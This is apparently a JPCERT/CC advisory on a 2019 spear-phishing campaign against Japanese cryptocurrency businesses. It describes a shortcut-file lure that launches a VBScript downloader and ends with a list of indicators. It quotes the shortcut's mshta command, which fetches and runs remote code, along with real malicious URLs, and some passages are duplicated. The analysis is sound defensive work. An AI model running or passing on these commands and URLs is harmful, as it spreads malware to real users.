Spear Phishing against Cryptocurrency Businesses
Contents
Spear Phishing against Cryptocurrency Businesses
As of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain a URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file. This article will describe the details of the attack method.
How the VBScript downloader is launched
The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
The shortcut file contains the following command:
C:\Windows\System32\mshta.exe https://bit.ly/31O88c3
When a user accesses the shortened URL, they will be redirected to the following site, and an HTML file containing the VBScript (Figure 2) is downloaded.
http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D
The behaviour of the VBScript is described in Figure 3. First, …
As of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain a URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file. This article will describe the details of the attack method.
How the VBScript downloader is launched
The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
The shortcut file contains the following command:
C:\Windows\System32\mshta.exe https://bit.ly/31O88c3
When a user accesses the shortened URL, they will be redirected to the following site, and an HTML file containing the VBScript (Figure 2) is downloaded.
http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D
The behaviour of the VBScript is described in Figure 3. First, …
IoC
01b5cd525d18e28177924d8a7805c2010de6842b8ef430f29ed32b3e5d7d99a0
10ce173cfe83321b44139e3d7d20c5ac1a9c1c99882387af0fdbadcfa2597651
122674a261ac7061c8a304f3e4a1fb13023f39102e5605e30f7aad0ab388dfa0
1533374acf886bc3015c4cba3da1c67e67111c22d00a8bbf7694c5394b91b9fc
4ecab0f81a2da70df5f2260bab7c8c130b200dbfe2bbd8e3d1845ff0c93c7861
57278dab6a0e8438444996503a6528ff8a816be0060d5e5db7a6ab1a0d6122f1
71346d2cb7ecf45d7fe221ede76da51a2ecb85110b9b27f1cb64c30f9af69250
7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6
75.133.9.84
7dcbeb1806296739acfa5819872e8d9669a9c60be1fc96be9cb73ca519917ae8
901eca85c5711a53e53c48309b3afd34cbb014c91a20f8f716ee21832c7cd5e0
997c4f7695a6a615da069d5f839582fdb83f215bc999e8af492636b2b5e3436c
9ad472872ba20c66fad56b7340ae869ff4d6708a2d0fc275a0faaded6ab7b507
9b20767b11f7e54644104d455aa25c6a0fc99ce9d7b39b98408f8687209585e2
a464781b616c86bbd68dbf909826444f7fd6c6ae378caf074926df7aebc4e3a1
b077edc8d08796cdff8b75e5cb66e0191510a559941b431e38040e51b6607876
c60aedbb20fdea048fa2d4b3bdc520f9f9b9172ee16c01dac19b33781b1bdb1d
d70988e43ebc4981e880489b11b6c374d466ef04803f9c2e084af037049cfd04
dc5f81c5bf0f5905ff2b6bdc4e1171fc41ad736da265801a64bb821bd76eace9
de7fde10fabf91c03cdd894e40a19e664a9f9866932a801e57f1b79088847ebd
e982a70cb21c915d847925bd364d6d87f02eac135eac3ba80ad448700e1ae9a7
f9e299c562195513968be88c6096957494cf15195a05c4abc907520eff872332
http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D
http://update.gdrives.top:8080/open?id=b7hMO0D%2ByNbNZSqXu4Putub%2BZLLqg/S66Foz0YKUjety914cQmWz32MV6BE44pEd
https://bit.ly/2SGs76y
https://bit.ly/31O88c3
10ce173cfe83321b44139e3d7d20c5ac1a9c1c99882387af0fdbadcfa2597651
122674a261ac7061c8a304f3e4a1fb13023f39102e5605e30f7aad0ab388dfa0
1533374acf886bc3015c4cba3da1c67e67111c22d00a8bbf7694c5394b91b9fc
4ecab0f81a2da70df5f2260bab7c8c130b200dbfe2bbd8e3d1845ff0c93c7861
57278dab6a0e8438444996503a6528ff8a816be0060d5e5db7a6ab1a0d6122f1
71346d2cb7ecf45d7fe221ede76da51a2ecb85110b9b27f1cb64c30f9af69250
7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6
75.133.9.84
7dcbeb1806296739acfa5819872e8d9669a9c60be1fc96be9cb73ca519917ae8
901eca85c5711a53e53c48309b3afd34cbb014c91a20f8f716ee21832c7cd5e0
997c4f7695a6a615da069d5f839582fdb83f215bc999e8af492636b2b5e3436c
9ad472872ba20c66fad56b7340ae869ff4d6708a2d0fc275a0faaded6ab7b507
9b20767b11f7e54644104d455aa25c6a0fc99ce9d7b39b98408f8687209585e2
a464781b616c86bbd68dbf909826444f7fd6c6ae378caf074926df7aebc4e3a1
b077edc8d08796cdff8b75e5cb66e0191510a559941b431e38040e51b6607876
c60aedbb20fdea048fa2d4b3bdc520f9f9b9172ee16c01dac19b33781b1bdb1d
d70988e43ebc4981e880489b11b6c374d466ef04803f9c2e084af037049cfd04
dc5f81c5bf0f5905ff2b6bdc4e1171fc41ad736da265801a64bb821bd76eace9
de7fde10fabf91c03cdd894e40a19e664a9f9866932a801e57f1b79088847ebd
e982a70cb21c915d847925bd364d6d87f02eac135eac3ba80ad448700e1ae9a7
f9e299c562195513968be88c6096957494cf15195a05c4abc907520eff872332
http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D
http://update.gdrives.top:8080/open?id=b7hMO0D%2ByNbNZSqXu4Putub%2BZLLqg/S66Foz0YKUjety914cQmWz32MV6BE44pEd
https://bit.ly/2SGs76y
https://bit.ly/31O88c3